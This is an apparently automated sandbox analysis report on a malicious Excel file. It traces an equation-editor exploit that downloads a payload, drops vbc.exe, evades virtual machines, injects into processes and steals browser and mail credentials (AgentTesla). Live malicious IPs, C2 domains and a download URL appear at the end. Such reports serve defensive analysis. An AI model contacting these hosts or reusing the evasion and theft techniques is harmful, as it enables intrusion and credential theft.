Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/12@16/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$0AX4532QWSA.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF47B.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path} Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: 0AX4532QWSA.xlsx Static file information: File size 1385984 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 0AX4532QWSA.xlsx Initial sample: OLE indicators vbamacros = False
Source: 0AX4532QWSA.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xE7B499BF [Sun Mar 8 17:45:35 2093 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_01147D93 push edi; retf 4_2_01147D9E
Source: C:\Users\Public\vbc.exe Code function: 4_2_01140A9A pushfd ; iretd 4_2_01140AA1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA34FC push FFFFFF8Bh; retf 5_2_00CA34FF
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA174 push ss; ret 5_2_049FA177
Source: initial sample Static PE information: section name: .text entropy: 7.9258080582

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: 0AX4532QWSA.xlsx Stream path 'EncryptedPackage' entropy: 7.99986275596 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL8
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9689 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2360 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2788 Thread sleep time: -31500s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2836 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2800 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3060 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3060 Thread sleep time: -120000s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMWARE8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: Fm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMWAREHDGm
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMwareHDGm
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: Fm"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: vmware8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware HDGm
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path} Jump to behavior
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificates
Source: C:\Users\Public\vbc.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 339305 Sample: 0AX4532QWSA.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->35 37 14 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 17 2->12         started        process3 dnsIp4 29 191.96.149.225, 49167, 80 MAJESTIC-HOSTING-01US Chile 7->29 21 C:\Users\user\AppData\Local\...\new[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 45 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->45 14 vbc.exe 7->14         started        file5 signatures6 process7 signatures8 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->47 49 Machine Learning detection for dropped file 14->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->51 53 Injects a PE file into a foreign processes 14->53 17 vbc.exe 6 14->17         started        process9 dnsIp10 25 gammavilla.org 217.174.152.38, 49168, 49171, 49172 TELEPOINTBG Bulgaria 17->25 27 mail.gammavilla.org 17->27 39 Tries to steal Mail credentials (via file access) 17->39 41 Tries to harvest and steal browser information (history, passwords, etc) 17->41 43 Installs a global keyboard hook 17->43 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.174.152.38
 unknown Bulgaria
31083 TELEPOINTBG true
191.96.149.225
 unknown Chile
396073 MAJESTIC-HOSTING-01US true

Contacted Domains

Name IP Active
gammavilla.org 217.174.152.38 true
mail.gammavilla.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://191.96.149.225/new.exe true
  • Avira URL Cloud: malware
 unknown